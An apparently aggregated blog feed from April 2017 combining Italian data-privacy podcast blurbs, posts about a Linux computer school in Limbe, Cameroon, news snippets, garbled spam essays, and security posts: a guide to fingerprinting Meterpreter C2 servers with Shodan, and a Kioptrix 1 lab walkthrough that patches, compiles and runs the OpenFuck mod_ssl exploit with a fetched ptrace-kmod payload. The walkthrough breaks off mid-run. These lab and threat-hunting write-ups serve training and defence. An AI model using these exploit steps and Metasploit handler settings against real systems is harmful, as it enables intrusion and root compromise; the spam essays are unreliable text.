Newer posts are loading.
You are at the newest post.
Click here to check if anything new just came in.

April 24 2017

Data Knightmare: DataKnightmare 1x28 - La madre di tutti i data grab

Pensavate che dare cinque anni di cartelle cliniche di 700mila pazienti gratis e senza alcun controllo a Google fosse il peggio? Benvenuti alla madre di tutti i data grab, doveun primo ministro promette i dati sanitari di un'intera nazione a IBM. Senza obiettivi, senza controlli, senza garanzie, senza ritorno economico, senza gara. E senza farlo sapere a nessuno.

April 21 2017

videogame confessional forum: jeremy penner

So, my name's Jeremy Penner. I'm 33. Living right now in Ottawa, Ontario in Canada. I don't know, I've been programming since I was old enough to read, which was three or four. So, I've always been...

Informatic school is in southwest Cameroon: TECHSHARE 2016

TECHSHARE 2016

Linux Friends say thank you , Techshare for your unfailling support to Future Stair Accademy. Your support has made us grown to maturity, with many good player in all Categories, Both Male and Female

 

IMG_20150104_042431 IMG_20150104_045115 IMG_20150104_04240920150711-000120150711-000320150711-000420150711-0007IMG_20161203_110524IMG_20161203_110522IMG_20161203_110519IMG_20161126_105022IMG_20161126_105020IMG_20161126_105016IMG_20161126_105012IMG_20161126_10494020150624-002920150620-000620150620-000420141204-000320150404-000120150404-0002IMG_20161203_110458IMG_20161130_141152IMG_20161115_165244IMG_20161115_165304IMG_20161115_165307IMG_20161115_165332IMG_20161115_165309girls1IMG-20161124-WA0000boysIMG-20161124-WA0004IMG-20161124-WA0003IMG-20161124-WA0005

Informatic school is in southwest Cameroon: SWISS FRIENDS 2016

SWISS FRIENDS SUPPORT 2016

Swiss Friends have for one year now support the objective, activities and development of the Association of Linux Friends Limbe. Swiss friends have paid for ties to be put on the floor of the classrooms  and staircase, roofing of the building, paying Motivation for seven Teachers,  and of course provided a Toyota Rav4 for the Association

IMG_20150112_021206 photo 4 (3) photo 4 (4) photo 4 (2) photo 3 (4) photo 1 (5) photo 1 (4) photo 2 (4) photo 2 (3) photo 4 (2) photo 3 (4) photo 3 (3) photo 3 (2) photo 2 (5)OM6A7998IMG_20150112_021201 IMG_20150112_020921 IMG_20150112_020912 IMG_20150112_020745 IMG_20150112_020730 IMG_20150112_020653 IMG_20150112_020645

In the news: Trasformatorio, a Scaletta Zanclea artisti da tutto il mondo per un futuro sostenibile - Sikily News


Sikily News

Trasformatorio, a Scaletta Zanclea artisti da tutto il mondo per un futuro sostenibile
Sikily News
L'evento è organizzato da Siddharte e Dyne.org con il patrocinio dell'Amministrazione comunale e in collaborazione con WISH (World International Sicilian Heritage), CairoTronica (Simposio internazionale di Arti Digitali del Cairo), MUSIF (Museo ...

April 20 2017

Informatic school is in southwest Cameroon: Computer School with Solar Section

Computer School with Solar Section

the educational project run by the Association of Linux Friends Limbe/Cameroon

 

Short Project Description. The Computer school run by the Linux Friends in Limbe /Cameroon includes an annual course providing basic knowledge in computer science as well as sporadic IT-courses on advanced level. Born out of necessity, the School more and more is also working on electricity production, thus responding to the fact that in vast parts of Cameroun the power supply needed for operating computers is not assured.

Students pay a symbolic school fee. The training curriculum and teaching methods (e-learning) are developed in accordance with the students’ request. Upon successful conclusion of the Annual Course students are allocated a certificate approved by the local authorities. The certificate is well appreciated by the participants and considered an entry point to working life. It particularly enables women to do a first important step towards the formal economical sector.

The educational program is offered in the day school and in evening classes. The teaching staff is recruited among the graduates of the school. At present, the majority of students and teachers are women. In the past year, 30 graduates (out of about 50 students enrolled) obtained the final certificate.

The Computer School of Linux Friends Limbe was initiated ten years ago by the Swiss Michel Pauli and the Cameroonian Chanceline Ngainku and is registered as a non-profit organization under the name Association of Linux Friends Limbe. As a result of continuous trials and inventive work of the local project team and thanks to worldwide advances in the field of mini-computers with low energy consumption, the school today disposes of a well-functioning technical equipment (basis: Raspberry Pi 2 and 3 and PiNet) with a total of 17 computer workstations. The school has Internet access. Part of the computer is solar energy-operated.

As a next big step the project aims to develop and stabilize the advanced level training. Students are to be able to further qualify in the ICT and solar systems sector. The objective is to realize a qualified training program based on the dual vocational training system as a model. The maintenance of the school’s network as well as commissioned work in the field of computer and solar system installation will allow students to put the acquired theoretical knowledge into practice. In order to maintain and develop the actual project-based knowhow it is required to expand the number of today eight staff positions (including administration and domestic services) to eleven adequately rewarded  working places.

The Context. In Cameroon, children from less well-off families generally have little chance to obtain a good professional education. The number of schools and study places offered by the State is not sufficient. Private schools are expensive. Only expensive schools are in a position to provide the necessary equipment and know-how to teach computer science. The dual vocational training as a training method is virtually non-existent. – Cameroon is ranked 152 out of 186 countries on the United Nations Human Development Index. Unemployment is high, at the same time the country is registering a shortage of skilled workers. Development projects working in the educational field complain about facing difficulties when trying to recruit specialists for computer and solar system installations. Such Projects may be considered potential partners providing commission work for educational projects trying to realize dual vocational training in Cameroon.  –  In Cameroonian economy women are equally active as men, however they tend to work in precarious conditions in the informal sector. If the family lacks money for the education of children, girls usually stand in the queue behind.

Objectives 2016/2017. End of 2016: The basic course (Beginners class) runs optimally. The responsible persons for the Advanced Level concept development are determined. End of 2017: A training concept and a financing plan on Advanced Level is designed. In view of a cooperation, contacts with Swiss training centers are initiated.

April 18 2017

In the news: «Les documents publiés sur les maliciels présumés de la NSA donnent des insformations aux criminels» - RT en français


RT en français

«Les documents publiés sur les maliciels présumés de la NSA donnent des insformations aux criminels»
RT en français
Les prétendus outils de cyber-infiltration de la NSA pourraient être utilisés par toute personne capable de reproduire et de modifier du code informatique, estime Denis Roio, développeur et cofondateur de Dyne.org . Un groupe de pirates nommé Shadow ...

and more »

April 17 2017

Data Knightmare: dataKnightmare 1x27 - Timeo Danaos

"In dio abbiamo fiducia, gli altri portino i dati?" Sì, magari. Il DataKnightmare ha paura dei peracottari, perfino quando portano i dati -- anzi, soprattutto; perché oggi i dati servono a giustificare la decisione che si vuole prendere, non a scoprire quale sia la decisione giusta. Uno sfogo pasquale.

April 13 2017

Expose human rights abuses, not the people who survive them (https:...

Expose human rights abuses, not the people who survive them

You’d probably never heard of him last week, but his face has gone viral this week. Dr. David Dao, the man who was dragged off of United Airlines flight #3411 on Sunday, was trying to get home to see patients. Instead, he ended up getting violently dragged off of a flight—to provide space for United crewmembers.

https://blog.witness.org/2017/04/expose-human-rights-abuses-not-people-survive/

Trasformatorio: Easy Approaches To Manage Stress

On the opposite hand, your article might bring about a demand actions centered on patterns of cause and effect you have recognized. The reason and effect essay may end in numerous ways. Remember the length necessities of the article. Inside this section you’ll discover examples of essays belonging to different article kinds and manners of […]

Trasformatorio: Advantages and Disadvantages of HMO and PPO Healthcare Plans

Guy understands he have totally freewill. Guys tend toward believe the cosmos was designed due to their unique use. If somebody understands which he or she can’t understand Lord, then they wont attempt judge additional individuals Every individual understands their particular talents, weaknesses and potential. There are numerous methods a willing individual has the skill […]

April 11 2017

Chokepoint: Hunting Red Team Meterpreter C2 Infrastructure

Introduction

This is part 2 of hunting Red Team C2 Infrastructure. Part 1 covered finding Empire C2 end points. In this post, we will show how to do the same for Meterpreter. There were no immediate crashing bugs found in the Meterpreter HTTP/S handler, but there is still enough information to profile these end points.

Meterpreter

Meterpreter is an advanced C2 infrastructure often used as a payload with the popular Metasploit exploit framework. It's cross-platform and highly extensible. In this post, we will focus on finding the reverse HTTP/S handlers for Meterpreter.

Meterpreter Headers

Using the HTTP request of GET / HTTP/1.0, the following headers were returned.


HTTP/1.1 200 OK
Connection: close
Server: Apache
Content-Length: 44

The thing that stands out here (similar to Empire) is the general lack of headers that would normally be present in a request. Also, the fact that we used HTTP/1.0 as the protocol, but the reply is still for HTTP/1.1

Meterpreter default page


<html><body><h1>It works!</h1></body></html>

Hashes of defaul page

MD5: c7b4690c8c46625ef0f328cd7a24a0a3
SHA1: 12179caec26a089cabcbb75c4dbe0bdfe60951f7
SHA2: 8f3ff2e2482468f3b9315a433b383f0cc0f9eb525889a34d4703b7681330a3fb

Finding Meterpreter Listeners with Shodan

Shodan is a search engine for Security Researchers. They routinely scan common ports across the Internet, and make the data publicly available, and easily searchable. APIs are also provided for automating a lot of the tasks required.

Using the common headers, and default web page listed above, we are able to narrow down the list of possible Meterpreter C2 node candidates on the Internet with a simple query.


'Server: Apache' 'It works!' -'Content-Type' 'Length: 44'

You'll notice that the results returned all are HTTP/1.1 with matching profiles that we scoped out above.

Random URLs

Another characteristic that makes Meterpreter listeners easy to identify, is that all requests that aren't to the backend result in the same response. Random URLs will get the same response as grabbing the index. Legitimate servers will typically produce a 404 error.

GET /lkafjdklfjasdklfjalkdjflkajd HTTP/1.0

Changing default values

There's no excuse for leaving your C2 node exposed to the entire Internet. Use whitelisting of IP space in order to keep your tests in scope, and avoid having other people attack your nodes. In order to change the default server and page discussed above, these are all part of the advanced settings.


use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 127.0.0.1
set LPORT 8000
show advanced
set MeterpreterServerName nginx
set HttpUnknownRequestResponse httml_here

Going beyond Shodan

In case there are any questions about the servers found being Meterpreter listeners, the following is a valid URI that will download Stage1 of the Meterpreter session from any given reverse HTTP/S listener.


GET /huO7Mf9GbAoRFBAVSfkxDwLTm3Wcz8n3kuXycv7k4vWV-_dXg3aY1iQy83Cejls15IeYlhUZ0QMT8S1zHKR33-Ga1rVIiV6QNFjXzTgr4lwNq_YR1tqyIbl9ddVzJ8UeYWJ0MJnThtVJ7d46IZnwHYok-XXZJrhqgUaaJMQtmCGCQWFA9tXMVtZtQEaR9Hse2Muw-P5TX4M7LKtm93LLFCT5i1NshdiwcWOnVJq HTTP/1.0

As we discussed in part 1, we can use Scans.io data in order to get a broader search of HTTPS servers. If you still have a copy of the data, you can run a zgrep search like the following to identify possible C2 nodes from this data.


zgrep 'PGh0bWw+PGJvZHk+PGgxPkl0IHdvcmtzITwvaDE+PC9ib2R5PjwvaHRtbD4=' 20170221-https.gz > /tmp/results.json

This may take several minutes to run, as the datasets are generally several gigabytes in size. The result will be a file containing JSON data for each host that returned the default Meterpreter HTML. You can parse this file and extract each IP address that should be tested.

Happy hunting.

Data Knightmare: dataKnightmare 1x26 - La sovranità sui dati

I nativi delle Americhe scambiavano oro e gemme in cambio di specchietti e perline di nessun valore. Oggi un ospedale pubblico cede milioni di cartelle cliniche pro bono a un'azienda di tecnologia perché sviluppi applicazioni diagnostiche. Trova le differenze. I dati sono forse il nuovo petrolio. Il problema è che le persone non sono fossili.

April 09 2017

Museo dell Informatica funzionante: Ora e sempre Resistenza: basic electronics course, 4th edition!

April 08 2017

videogame confessional forum: gennifer hutchison

Okay, yeah. My name is Gennifer Hutchison. I'm 39 and I am based in Los Angeles. I'm a television writer and while I also write for features, I'm probably best known for writing on Breaking Bad and...

April 07 2017

In the news: Baarde Amsterdam met internet een digitaal monster? - Netkwesties


Netkwesties

Baarde Amsterdam met internet een digitaal monster?
Netkwesties
Winnaar werd Totem Open Health, een gecompliceerd open source project voor een veilig gebruik van digitaal verzamelde medische data. Een eervolle vermelding kreeg Dowse.eu van Dyne.org, een privacyhulp voor Internet of Things. De jury werd geleid ...

April 06 2017

Tz’ikin TeVé Programa 03

Tz’ikin TeVé Programa 03

Los invitamos a ver el 3° episodio de Tz’ikin TeVé

Tz’ikin TeVé Programa 03

Image/photo

BIENVENIDAS y BIENVENIDOS a la tercera emisión de Tz’ikin TeVé, televisión comunitaria. En este nuevo programa, Claro y Pelado y Micrófono Abierto nos muestran algunas de las exigencias de la pobla…

Chokepoint: Fixing and troubleshooting OpenFuck Exploit

In a previous post I had went over a walk through for Kioptrix Level 1. I had some issues and wanted to document them for anyone else that may run into those issues. I'll admit that my first problem was getting ahead of myself and trying to compile the source code before doing anything else. Finally googling gave the answer that was right smack dab in front of my face which is looking at the first 8 lines of the source


/*
* E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
*
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
*/

Beyond doing what is outlined on paulsec.github.io I had done a dist-upgrade to kali which seemed to have mess with some other settings. On top of installing libssl-dev it appeared I was missing some more ssl libraries and i'll be honest in saying i'm not sure which one it was that fixed my issue but I ended up installing libssl1.0-dev, libssl1.0.2, libssl1.1 as outlined below


root@kali:~# apt-cache search libssl
cl-plus-ssl - Common Lisp interface to OpenSSL
dcmtk - OFFIS DICOM toolkit command line utilities
dlang-openssl - D version of the C headers for openssl
libdcmtk-dev - OFFIS DICOM toolkit development libraries and headers
libdcmtk8 - OFFIS DICOM toolkit runtime libraries
libssl-dev - Secure Sockets Layer toolkit - development files
libssl-doc - Secure Sockets Layer toolkit - development documentation
libssl-ocaml - OCaml bindings for OpenSSL (runtime)
libssl-ocaml-dev - OCaml bindings for OpenSSL
libssl1.0-dev - Secure Sockets Layer toolkit - development files
libssl1.0.2 - Secure Sockets Layer toolkit - shared libraries
libssl1.1 - Secure Sockets Layer toolkit - shared libraries
perl-openssl-defaults - version compatibility baseline for Perl OpenSSL packages
r-cran-openssl - GNU R toolkit for encryption, signatures and certificates based on OpenSSL

The point of this is that you may have some missing libraries and trying to compile the source with these missing libraries doesn't exactly tell you that you're missing it or which ones. So if you are still getting errors when compiling after following what is outlined in paulsec.github.io you may want to try to install those other ssl libraries like I had to.

Chokepoint: Kioptrix 1 - Vulnhub Walkthrough - ssl_mod

Introduction

This is the second walk through I’m doing in the series. I’m tackling VM’s that are told to be similar to what’s on the OSCP PWK. Since I’ll be tackling the OSCP again in the future I figure this will be good practice in the meantime.

Kioptrix is a series itself with I believe 5 vulnerable VM’s geared towards beginners and since that’s still what I consider myself I’m going to tackle this whole series.

I had some trouble early on with the initial porting from VMWare vmdk to VirtualBox since that’s what I’m currently using. Porting it over isn’t hard just have to remember from the last time I did it. A quick google turned up the easy information I had forgotten. Also to note my version of VirtualBox defaulted to SSD for the hard drive but Kioptrix wasn’t having that giving me a kernel panic. Changing that to IDE hard drive fixed it. Next issue was getting dhcp to issue a ip address. I have pfsense running for internal network to keep my environment safe and not let anything in or out other than the host OS. For whatever reason Kioptrix didn’t like the intel pro100/1000 virtual chipset so I had to change that PCNet PCI II for it to get dhcp. I assume that has something to do with my version of VirtualBox and how old the kernel on the VM is. Either way I got it working.

Enumeration

As always I start enumerating the ports to see what’s open gathering the headers and versions and OS information. ENUMERATE ALL THE THINGS!


root@kali:~# nmap -sV -Pn -p1-65535 -A 172.16.2.13 --open

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-02 13:57 CDT
Nmap scan report for 172.16.2.13
Host is up (0.00033s latency).
Not shown: 65529 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32770/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2017-04-02T19:56:59+00:00; +59m19s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
32768/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:AF:56:C9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: 59m18s, deviation: 0s, median: 59m18s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC: (unknown)

TRACEROUTE
HOP RTT ADDRESS
1 0.33 ms 172.16.2.13

So just the open ports and services seem to give a great deal of information. We see both port 80 and 443 open so lets run nikto and see what it comes up with next.


root@kali:~# nikto -host 172.16.2.13
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.2.13
+ Target Hostname: 172.16.2.13
+ Target Port: 80
+ Start Time: 2017-04-05 21:25:29 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 22:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 17 error(s) and 19 item(s) reported on remote host
+ End Time: 2017-04-05 21:33:12 (GMT-5) (463 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

I highlighted the part that looked most interesting to me. Seems there's a remote buffer overflow which allows attackers to kill any process on the system with CVE 2002-0082 so lets google around for that.

Looks like we have an exploit from exploit-db! That's very hopeful. Prior to going all out and compiling and attacking read the source first. The source tells you it's outdated and needs to have some updates and shows a url to head to. Remember the CVE is from 2002! So heading over to the url it shows the following updates that need made.


apt-get install libssl-dev

add the following libraries to the source code


#include <openssl/rc4.h>
#include <openssl/md5.h>

Next search in the source code for "wget" without the quotes and replace the url you find with this one


http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
Next find line 961 and add "const" to the beginning should look like the following

const unsigned char *p, *end;

Finally we need to compile it


gcc -o OpenFuck 764.c -lcrypto

I had done mine slightly different since since my lab doesn't go out to the internet other than my kali box if I change the network configuration. So I downloaded ptrace-kmod.c from packetstormsecurity to my kali box and moved it to /var/www/html and started apache and changed the line with wget to 172.16.2.13/ptrace-kmod.c.


wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
mv ptrace-kmod.c /var/www/html
service apache2 start

Finally let's run the exploit!


root@kali:~# ./openfuck

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./openfuck target box [port] [-c N]

target - supported box eg: 0x00
box - hostname or IP address
port - port for ssl connection
-c open N connections. (use range 40-50 if u dont know)


Supported OffSet:
0x00 - Caldera OpenLinux (apache-1.3.26)
0x01 - Cobalt Sun 6.0 (apache-1.3.12)
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x03 - Cobalt Sun x (apache-1.3.26)
0x04 - Cobalt Sun x Fixed2 (apache-1.3.26)
0x05 - Conectiva 4 (apache-1.3.6)
0x06 - Conectiva 4.1 (apache-1.3.9)
0x07 - Conectiva 6 (apache-1.3.14)
0x08 - Conectiva 7 (apache-1.3.12)
0x09 - Conectiva 7 (apache-1.3.19)
0x0a - Conectiva 7/8 (apache-1.3.26)
0x0b - Conectiva 8 (apache-1.3.22)
0x0c - Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)
0x0d - Debian GNU Linux (apache_1.3.19-1)
0x0e - Debian GNU Linux (apache_1.3.22-2)
0x0f - Debian GNU Linux (apache-1.3.22-2.1)
0x10 - Debian GNU Linux (apache-1.3.22-5)
0x11 - Debian GNU Linux (apache_1.3.23-1)
0x12 - Debian GNU Linux (apache_1.3.24-2.1)
0x13 - Debian Linux GNU Linux 2 (apache_1.3.24-2.1)
0x14 - Debian GNU Linux (apache_1.3.24-3)
0x15 - Debian GNU Linux (apache-1.3.26-1)
0x16 - Debian GNU Linux 3.0 Woody (apache-1.3.26-1)
0x17 - Debian GNU Linux (apache-1.3.27)
0x18 - FreeBSD (apache-1.3.9)
0x19 - FreeBSD (apache-1.3.11)
0x1a - FreeBSD (apache-1.3.12.1.40)
0x1b - FreeBSD (apache-1.3.12.1.40)
0x1c - FreeBSD (apache-1.3.12.1.40)
0x1d - FreeBSD (apache-1.3.12.1.40_1)
0x1e - FreeBSD (apache-1.3.12)
0x1f - FreeBSD (apache-1.3.14)
0x20 - FreeBSD (apache-1.3.14)
0x21 - FreeBSD (apache-1.3.14)
0x22 - FreeBSD (apache-1.3.14)
0x23 - FreeBSD (apache-1.3.14)
0x24 - FreeBSD (apache-1.3.17_1)
0x25 - FreeBSD (apache-1.3.19)
0x26 - FreeBSD (apache-1.3.19_1)
0x27 - FreeBSD (apache-1.3.20)
0x28 - FreeBSD (apache-1.3.20)
0x29 - FreeBSD (apache-1.3.20+2.8.4)
0x2a - FreeBSD (apache-1.3.20_1)
0x2b - FreeBSD (apache-1.3.22)
0x2c - FreeBSD (apache-1.3.22_7)
0x2d - FreeBSD (apache_fp-1.3.23)
0x2e - FreeBSD (apache-1.3.24_7)
0x2f - FreeBSD (apache-1.3.24+2.8.8)
0x30 - FreeBSD 4.6.2-Release-p6 (apache-1.3.26)
0x31 - FreeBSD 4.6-Realease (apache-1.3.26)
0x32 - FreeBSD (apache-1.3.27)
0x33 - Gentoo Linux (apache-1.3.24-r2)
0x34 - Linux Generic (apache-1.3.14)
0x35 - Mandrake Linux X.x (apache-1.3.22-10.1mdk)
0x36 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x37 - Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)
0x38 - Mandrake Linux 7.2 (apache-1.3.14-2mdk)
0x39 - Mandrake Linux 7.2 (apache-1.3.14) 2
0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
0x3c - Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)
0x3d - Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)
0x3e - Mandrake Linux 8.0 (apache-1.3.19-3)
0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
0x40 - Mandrake Linux 8.2 (apache-1.3.23-4)
0x41 - Mandrake Linux 8.2 #2 (apache-1.3.23-4)
0x42 - Mandrake Linux 8.2 (apache-1.3.24)
0x43 - Mandrake Linux 9 (apache-1.3.26)
0x44 - RedHat Linux ?.? GENERIC (apache-1.3.12-1)
0x45 - RedHat Linux TEST1 (apache-1.3.12-1)
0x46 - RedHat Linux TEST2 (apache-1.3.12-1)
0x47 - RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)
0x48 - RedHat Linux 4.2 (apache-1.1.3-3)
0x49 - RedHat Linux 5.0 (apache-1.2.4-4)
0x4a - RedHat Linux 5.1-Update (apache-1.2.6)
0x4b - RedHat Linux 5.1 (apache-1.2.6-4)
0x4c - RedHat Linux 5.2 (apache-1.3.3-1)
0x4d - RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)
0x4e - RedHat Linux 6.0 (apache-1.3.6-7)
0x4f - RedHat Linux 6.0 (apache-1.3.6-7)
0x50 - RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)
0x51 - RedHat Linux 6.0 Update (apache-1.3.24)
0x52 - RedHat Linux 6.1 (apache-1.3.9-4)1
0x53 - RedHat Linux 6.1 (apache-1.3.9-4)2
0x54 - RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)
0x55 - RedHat Linux 6.1-fp2000 (apache-1.3.26)
0x56 - RedHat Linux 6.2 (apache-1.3.12-2)1
0x57 - RedHat Linux 6.2 (apache-1.3.12-2)2
0x58 - RedHat Linux 6.2 mod(apache-1.3.12-2)3
0x59 - RedHat Linux 6.2 update (apache-1.3.22-5.6)1
0x5a - RedHat Linux 6.2-Update (apache-1.3.22-5.6)2
0x5b - Redhat Linux 7.x (apache-1.3.22)
0x5c - RedHat Linux 7.x (apache-1.3.26-1)
0x5d - RedHat Linux 7.x (apache-1.3.27)
0x5e - RedHat Linux 7.0 (apache-1.3.12-25)1
0x5f - RedHat Linux 7.0 (apache-1.3.12-25)2
0x60 - RedHat Linux 7.0 (apache-1.3.14-2)
0x61 - RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)
0x62 - RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)
0x63 - RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)
0x64 - RedHat Linux 7.1 (apache-1.3.19-5)1
0x65 - RedHat Linux 7.1 (apache-1.3.19-5)2
0x66 - RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)
0x67 - RedHat Linux 7.1-Update (1.3.22-5.7.1)
0x68 - RedHat Linux 7.1 (apache-1.3.22-src)
0x69 - RedHat Linux 7.1-Update (1.3.27-1.7.1)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x6c - RedHat Linux 7.2-Update (apache-1.3.22-6)
0x6d - RedHat Linux 7.2 (apache-1.3.24)
0x6e - RedHat Linux 7.2 (apache-1.3.26)
0x6f - RedHat Linux 7.2 (apache-1.3.26-snc)
0x70 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)1
0x71 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)2
0x72 - RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)
0x73 - RedHat Linux 7.3 (apache-1.3.23-11)1
0x74 - RedHat Linux 7.3 (apache-1.3.23-11)2
0x75 - RedHat Linux 7.3 (apache-1.3.27)
0x76 - RedHat Linux 8.0 (apache-1.3.27)
0x77 - RedHat Linux 8.0-second (apache-1.3.27)
0x78 - RedHat Linux 8.0 (apache-2.0.40)
0x79 - Slackware Linux 4.0 (apache-1.3.6)
0x7a - Slackware Linux 7.0 (apache-1.3.9)
0x7b - Slackware Linux 7.0 (apache-1.3.26)
0x7c - Slackware 7.0 (apache-1.3.26)2
0x7d - Slackware Linux 7.1 (apache-1.3.12)
0x7e - Slackware Linux 8.0 (apache-1.3.20)
0x7f - Slackware Linux 8.1 (apache-1.3.24)
0x80 - Slackware Linux 8.1 (apache-1.3.26)
0x81 - Slackware Linux 8.1-stable (apache-1.3.26)
0x82 - Slackware Linux (apache-1.3.27)
0x83 - SuSE Linux 7.0 (apache-1.3.12)
0x84 - SuSE Linux 7.1 (apache-1.3.17)
0x85 - SuSE Linux 7.2 (apache-1.3.19)
0x86 - SuSE Linux 7.3 (apache-1.3.20)
0x87 - SuSE Linux 8.0 (apache-1.3.23)
0x88 - SUSE Linux 8.0 (apache-1.3.23-120)
0x89 - SuSE Linux 8.0 (apache-1.3.23-137)
0x8a - Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)
Looks like we need to do a little more. So we know we have RedHat and we know it's apache 1.3.20. So looks like our options are

0x6a or 0x6b

Lets try the first one


root@kali:~# ./openfuck 0x6a 172.16.2.13 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
